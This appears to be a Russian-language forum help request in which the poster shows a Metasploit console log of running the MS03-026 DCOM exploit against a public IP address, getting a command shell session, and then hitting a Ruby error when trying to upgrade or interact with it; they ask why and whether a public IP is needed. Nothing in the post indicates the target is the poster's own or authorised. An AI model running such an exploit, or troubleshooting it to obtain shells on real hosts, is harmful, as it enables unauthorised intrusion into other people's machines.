Не прилетает meterpriter сессия создаётся. Нужен белый ip ?
Подскажите, что не так делаю.
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/dcerpc/ms03_026_dcom) >
[*] 93.213.65.23:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 93.213.65.23:135 - Binding to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...
[*] 93.213.65.23:135 - Bound to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...
[*] 93.213.65.23:135 - Sending exploit ...
[*] Started bind TCP handler against 93.213.65.23:135
[*] Command shell session 1 opened (0.0.0.0:0 -> 93.213.65.23:135) at 2020-10-03 14:57:58 +0700
msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/windows 0.0.0.0:0 -> 93.213.65.23:135 (93.213.65.23)
msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
shell
[*] Trying to find binary(python) on target machine
[-] Session manipulation failed: undefined method `reverse!' for nil:NilClass ["C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/
ork-5.0.97/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'", "C:/metasploit/apps/pro/ etc...